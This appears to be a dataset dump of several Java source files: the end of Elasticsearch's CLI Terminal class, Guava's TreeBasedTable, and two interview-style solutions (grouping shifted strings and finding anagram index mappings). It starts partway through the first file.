}
return answerYes;
}
}
/**
* Read from the reader until we find a newline. If that newline
* character is immediately preceded by a carriage return, we have
* a Windows-style newline, so we discard the carriage return as well
* as the newline.
*/
public static char[] readLineToCharArray(Reader reader) {
char[] buf = new char[128];
try {
int len = 0;
int next;
while ((next = reader.read()) != -1) {
char nextChar = (char) next;
if (nextChar == '\n') {
break;
}
if (len >= buf.length) {
char[] newbuf = new char[buf.length * 2];
System.arraycopy(buf, 0, newbuf, 0, buf.length);
Arrays.fill(buf, '\0');
buf = newbuf;
}
buf[len++] = nextChar;
}
if (len == 0 && next == -1) {
return null;
}
if (len > 0 && len <= buf.length && buf[len - 1] == '\r') {
len--;
}
char[] shortResult = Arrays.copyOf(buf, len);
Arrays.fill(buf, '\0');
return shortResult;
} catch (IOException e) {
throw new RuntimeException(e);
}
}
/**
* Flush the outputs of this terminal.
*/
public final void flush() {
outWriter.flush();
errWriter.flush();
}
/**
* Indicates whether this terminal is for a headless system i.e. is not interactive. If an instances answers
* {@code false}, interactive operations can be attempted, but it is not guaranteed that they will succeed.
*
* @return if this terminal is headless.
*/
public boolean isHeadless() {
return false;
}
private static class ConsoleTerminal extends Terminal {
private static final int JDK_VERSION_WITH_IS_TERMINAL = 22;
private static final Console CONSOLE = detectTerminal();
ConsoleTerminal() {
super(CONSOLE.reader(), CONSOLE.writer(), ERROR_WRITER);
}
static boolean isSupported() {
return CONSOLE != null;
}
static Console detectTerminal() {
// JDK >= 22 returns a console even if the terminal is redirected unless using -Djdk.console=java.base
// https://bugs.openjdk.org/browse/JDK-8308591
Console console = System.console();
if (console != null && Runtime.version().feature() >= JDK_VERSION_WITH_IS_TERMINAL) {
try {
// verify the console is a terminal using isTerminal() on JDK >= 22
// TODO: Remove reflection once Java 22 sources are supported, e.g. using a MRJAR
Method isTerminal = Console.class.getMethod("isTerminal");
return Boolean.TRUE.equals(isTerminal.invoke(console)) ? console : null;
} catch (NoSuchMethodException | IllegalAccessException | InvocationTargetException e) {
throw new AssertionError(e);
}
}
return console;
}
@Override
public String readText(String prompt) {
return CONSOLE.readLine("%s", prompt);
}
@Override
public char[] readSecret(String prompt) {
return CONSOLE.readPassword("%s", prompt);
}
}
/** visible for testing */
@SuppressForbidden(reason = "Access streams for construction")
static class SystemTerminal extends Terminal {
SystemTerminal() {
super(
// TODO: InputStreamReader can advance stdin past what it decodes. We need a way to buffer this and put it back
// at the end of each character based read, so that switching to using getInputStream() returns binary data
// right after the last character based input (newline)
new InputStreamReader(System.in, Charset.defaultCharset()),
new PrintWriter(System.out, true),
ERROR_WRITER
);
}
@Override
public InputStream getInputStream() {
return System.in;
}
@Override
public OutputStream getOutputStream() {
return System.out;
}
}
/** A line based OutputStream wrapping this Terminal's println, not thread-safe! */
private class LineOutputStream extends OutputStream {
static final int DEFAULT_BUFFER_LENGTH = 1024;
static final int MAX_BUFFER_LENGTH = DEFAULT_BUFFER_LENGTH * 8;
private final Charset charset;
private byte[] bytes = new byte[DEFAULT_BUFFER_LENGTH];
private int count = 0;
LineOutputStream(Charset charset) {
this.charset = charset;
}
@Override
public void write(int b) {
if (b == 0) return;
if (b == '\n') {
flush(true);
return;
}
if (count == bytes.length) {
if (count >= MAX_BUFFER_LENGTH) {
flush(false);
} else {
bytes = Arrays.copyOf(bytes, 2 * bytes.length);
}
}
bytes[count++] = (byte) b;
}
private void flush(boolean newline) {
if (newline && count > 0 && bytes[count - 1] == '\r') {
--count; // drop CR on windows as well
}
String msg = count > 0 ? new String(bytes, 0, count, charset) : "";
print(Verbosity.NORMAL, outWriter, msg, newline, true);
count = 0;
if (bytes.length > DEFAULT_BUFFER_LENGTH) {
bytes = new byte[DEFAULT_BUFFER_LENGTH];
}
}
@Override
public void flush() {
if (count > 0) {
flush(false);
}
}
}
}
| elastic/elasticsearch | libs/cli/src/main/java/org/elasticsearch/cli/Terminal.java |
1,190 | // Given a string, we can "shift" each of its letter to its successive letter, for example: "abc" -> "bcd". We can keep "shifting" which forms the sequence:
// "abc" -> "bcd" -> ... -> "xyz"
// Given a list of strings which contains only lowercase alphabets, group all strings that belong to the same shifting sequence.
// For example, given: ["abc", "bcd", "acef", "xyz", "az", "ba", "a", "z"],
// A solution is:
// [
// ["abc","bcd","xyz"],
// ["az","ba"],
// ["acef"],
// ["a","z"]
// ]
public class GroupShiftedStrings {
public List<List<String>> groupStrings(String[] strings) {
List<List<String>> result = new ArrayList<List<String>>();
HashMap<String, List<String>> map = new HashMap<String, List<String>>();
for(String s : strings) {
int offset = s.charAt(0) - 'a';
String key = "";
for(int i = 0; i < s.length(); i++) {
char current = (char)(s.charAt(i) - offset);
if(current < 'a') {
current += 26;
}
key += current;
}
if(!map.containsKey(key)) {
List<String> list = new ArrayList<String>();
map.put(key, list);
}
map.get(key).add(s);
}
for(String key : map.keySet()) {
List<String> list = map.get(key);
Collections.sort(list);
result.add(list);
}
return result;
}
}
| kdn251/interviews | company/google/GroupShiftedStrings.java |
1,195 | /*
* Copyright (C) 2008 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.common.collect;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkNotNull;
import static java.util.Objects.requireNonNull;
import com.google.common.annotations.GwtCompatible;
import com.google.common.base.Supplier;
import java.io.Serializable;
import java.util.Comparator;
import java.util.Iterator;
import java.util.Map;
import java.util.NoSuchElementException;
import java.util.Set;
import java.util.SortedMap;
import java.util.SortedSet;
import java.util.TreeMap;
import javax.annotation.CheckForNull;
/**
* Implementation of {@code Table} whose row keys and column keys are ordered by their natural
* ordering or by supplied comparators. When constructing a {@code TreeBasedTable}, you may provide
* comparators for the row keys and the column keys, or you may use natural ordering for both.
*
* <p>The {@link #rowKeySet} method returns a {@link SortedSet} and the {@link #rowMap} method
* returns a {@link SortedMap}, instead of the {@link Set} and {@link Map} specified by the {@link
* Table} interface.
*
* <p>The views returned by {@link #column}, {@link #columnKeySet()}, and {@link #columnMap()} have
* iterators that don't support {@code remove()}. Otherwise, all optional operations are supported.
* Null row keys, columns keys, and values are not supported.
*
* <p>Lookups by row key are often faster than lookups by column key, because the data is stored in
* a {@code Map<R, Map<C, V>>}. A method call like {@code column(columnKey).get(rowKey)} still runs
* quickly, since the row key is provided. However, {@code column(columnKey).size()} takes longer,
* since an iteration across all row keys occurs.
*
* <p>Because a {@code TreeBasedTable} has unique sorted values for a given row, both {@code
* row(rowKey)} and {@code rowMap().get(rowKey)} are {@link SortedMap} instances, instead of the
* {@link Map} specified in the {@link Table} interface.
*
* <p>Note that this implementation is not synchronized. If multiple threads access this table
* concurrently and one of the threads modifies the table, it must be synchronized externally.
*
* <p>See the Guava User Guide article on <a href=
* "https://github.com/google/guava/wiki/NewCollectionTypesExplained#table">{@code Table}</a>.
*
* @author Jared Levy
* @author Louis Wasserman
* @since 7.0
*/
@GwtCompatible(serializable = true)
@ElementTypesAreNonnullByDefault
public class TreeBasedTable<R, C, V> extends StandardRowSortedTable<R, C, V> {
private final Comparator<? super C> columnComparator;
private static class Factory<C, V> implements Supplier<TreeMap<C, V>>, Serializable {
final Comparator<? super C> comparator;
Factory(Comparator<? super C> comparator) {
this.comparator = comparator;
}
@Override
public TreeMap<C, V> get() {
return new TreeMap<>(comparator);
}
private static final long serialVersionUID = 0;
}
/**
* Creates an empty {@code TreeBasedTable} that uses the natural orderings of both row and column
* keys.
*
* <p>The method signature specifies {@code R extends Comparable} with a raw {@link Comparable},
* instead of {@code R extends Comparable<? super R>}, and the same for {@code C}. That's
* necessary to support classes defined without generics.
*/
@SuppressWarnings("rawtypes") // https://github.com/google/guava/issues/989
public static <R extends Comparable, C extends Comparable, V> TreeBasedTable<R, C, V> create() {
return new TreeBasedTable<>(Ordering.natural(), Ordering.natural());
}
/**
* Creates an empty {@code TreeBasedTable} that is ordered by the specified comparators.
*
* @param rowComparator the comparator that orders the row keys
* @param columnComparator the comparator that orders the column keys
*/
public static <R, C, V> TreeBasedTable<R, C, V> create(
Comparator<? super R> rowComparator, Comparator<? super C> columnComparator) {
checkNotNull(rowComparator);
checkNotNull(columnComparator);
return new TreeBasedTable<>(rowComparator, columnComparator);
}
/**
* Creates a {@code TreeBasedTable} with the same mappings and sort order as the specified {@code
* TreeBasedTable}.
*/
public static <R, C, V> TreeBasedTable<R, C, V> create(TreeBasedTable<R, C, ? extends V> table) {
TreeBasedTable<R, C, V> result =
new TreeBasedTable<>(table.rowComparator(), table.columnComparator());
result.putAll(table);
return result;
}
TreeBasedTable(Comparator<? super R> rowComparator, Comparator<? super C> columnComparator) {
super(new TreeMap<R, Map<C, V>>(rowComparator), new Factory<C, V>(columnComparator));
this.columnComparator = columnComparator;
}
// TODO(jlevy): Move to StandardRowSortedTable?
/**
* Returns the comparator that orders the rows. With natural ordering, {@link Ordering#natural()}
* is returned.
*
* @deprecated Use {@code table.rowKeySet().comparator()} instead.
*/
@Deprecated
public Comparator<? super R> rowComparator() {
/*
* requireNonNull is safe because the factories require non-null Comparators, which they pass on
* to the backing collections.
*/
return requireNonNull(rowKeySet().comparator());
}
/**
* Returns the comparator that orders the columns. With natural ordering, {@link
* Ordering#natural()} is returned.
*
* @deprecated Store the {@link Comparator} alongside the {@link Table}. Or, if you know that the
* {@link Table} contains at least one value, you can retrieve the {@link Comparator} with:
* {@code ((SortedMap<C, V>) table.rowMap().values().iterator().next()).comparator();}.
*/
@Deprecated
public Comparator<? super C> columnComparator() {
return columnComparator;
}
// TODO(lowasser): make column return a SortedMap
/**
* {@inheritDoc}
*
* <p>Because a {@code TreeBasedTable} has unique sorted values for a given row, this method
* returns a {@link SortedMap}, instead of the {@link Map} specified in the {@link Table}
* interface.
*
* @since 10.0 (<a href="https://github.com/google/guava/wiki/Compatibility" >mostly
* source-compatible</a> since 7.0)
*/
@Override
public SortedMap<C, V> row(R rowKey) {
return new TreeRow(rowKey);
}
private class TreeRow extends Row implements SortedMap<C, V> {
@CheckForNull final C lowerBound;
@CheckForNull final C upperBound;
TreeRow(R rowKey) {
this(rowKey, null, null);
}
TreeRow(R rowKey, @CheckForNull C lowerBound, @CheckForNull C upperBound) {
super(rowKey);
this.lowerBound = lowerBound;
this.upperBound = upperBound;
checkArgument(
lowerBound == null || upperBound == null || compare(lowerBound, upperBound) <= 0);
}
@Override
public SortedSet<C> keySet() {
return new Maps.SortedKeySet<>(this);
}
@Override
public Comparator<? super C> comparator() {
return columnComparator();
}
int compare(Object a, Object b) {
// pretend we can compare anything
@SuppressWarnings("unchecked")
Comparator<Object> cmp = (Comparator<Object>) comparator();
return cmp.compare(a, b);
}
boolean rangeContains(@CheckForNull Object o) {
return o != null
&& (lowerBound == null || compare(lowerBound, o) <= 0)
&& (upperBound == null || compare(upperBound, o) > 0);
}
@Override
public SortedMap<C, V> subMap(C fromKey, C toKey) {
checkArgument(rangeContains(checkNotNull(fromKey)) && rangeContains(checkNotNull(toKey)));
return new TreeRow(rowKey, fromKey, toKey);
}
@Override
public SortedMap<C, V> headMap(C toKey) {
checkArgument(rangeContains(checkNotNull(toKey)));
return new TreeRow(rowKey, lowerBound, toKey);
}
@Override
public SortedMap<C, V> tailMap(C fromKey) {
checkArgument(rangeContains(checkNotNull(fromKey)));
return new TreeRow(rowKey, fromKey, upperBound);
}
@Override
public C firstKey() {
updateBackingRowMapField();
if (backingRowMap == null) {
throw new NoSuchElementException();
}
return ((SortedMap<C, V>) backingRowMap).firstKey();
}
@Override
public C lastKey() {
updateBackingRowMapField();
if (backingRowMap == null) {
throw new NoSuchElementException();
}
return ((SortedMap<C, V>) backingRowMap).lastKey();
}
@CheckForNull transient SortedMap<C, V> wholeRow;
// If the row was previously empty, we check if there's a new row here every time we're queried.
void updateWholeRowField() {
if (wholeRow == null || (wholeRow.isEmpty() && backingMap.containsKey(rowKey))) {
wholeRow = (SortedMap<C, V>) backingMap.get(rowKey);
}
}
@Override
@CheckForNull
SortedMap<C, V> computeBackingRowMap() {
updateWholeRowField();
SortedMap<C, V> map = wholeRow;
if (map != null) {
if (lowerBound != null) {
map = map.tailMap(lowerBound);
}
if (upperBound != null) {
map = map.headMap(upperBound);
}
return map;
}
return null;
}
@Override
void maintainEmptyInvariant() {
updateWholeRowField();
if (wholeRow != null && wholeRow.isEmpty()) {
backingMap.remove(rowKey);
wholeRow = null;
backingRowMap = null;
}
}
@Override
public boolean containsKey(@CheckForNull Object key) {
return rangeContains(key) && super.containsKey(key);
}
@Override
@CheckForNull
public V put(C key, V value) {
checkArgument(rangeContains(checkNotNull(key)));
return super.put(key, value);
}
}
// rowKeySet() and rowMap() are defined here so they appear in the Javadoc.
@Override
public SortedSet<R> rowKeySet() {
return super.rowKeySet();
}
@Override
public SortedMap<R, Map<C, V>> rowMap() {
return super.rowMap();
}
/** Overridden column iterator to return columns values in globally sorted order. */
@Override
Iterator<C> createColumnKeyIterator() {
Comparator<? super C> comparator = columnComparator();
Iterator<C> merged =
Iterators.mergeSorted(
Iterables.transform(
backingMap.values(), (Map<C, V> input) -> input.keySet().iterator()),
comparator);
return new AbstractIterator<C>() {
@CheckForNull C lastValue;
@Override
@CheckForNull
protected C computeNext() {
while (merged.hasNext()) {
C next = merged.next();
boolean duplicate = lastValue != null && comparator.compare(next, lastValue) == 0;
// Keep looping till we find a non-duplicate value.
if (!duplicate) {
lastValue = next;
return lastValue;
}
}
lastValue = null; // clear reference to unused data
return endOfData();
}
};
}
private static final long serialVersionUID = 0;
}
| google/guava | guava/src/com/google/common/collect/TreeBasedTable.java |
1,197 | //Given two lists Aand B, and B is an anagram of A. B is an anagram of A means B is made by randomizing the order of the elements in A.
//We want to find an index mapping P, from A to B. A mapping P[i] = j means the ith element in A appears in B at index j.
//These lists A and B may contain duplicates. If there are multiple answers, output any of them.
//For example, given
//A = [12, 28, 46, 32, 50]
//B = [50, 12, 32, 46, 28]
//We should return
//[1, 4, 3, 2, 0]
//as P[0] = 1 because the 0th element of A appears at B[1], and P[1] = 4 because the 1st element of A appears at B[4], and so on.
class FindAnagramMappings {
public int[] anagramMappings(int[] A, int[] B) {
int[] mapping = new int[A.length];
HashMap<Integer, Integer> map = new HashMap<Integer, Integer>();
for(int i = 0; i < B.length; i++) {
map.put(B[i], i);
}
for(int i = 0; i < A.length; i++) {
mapping[i] = map.get(A[i]);
}
return mapping;
}
}
| kdn251/interviews | leetcode/hash-table/FindAnagramMappings.java |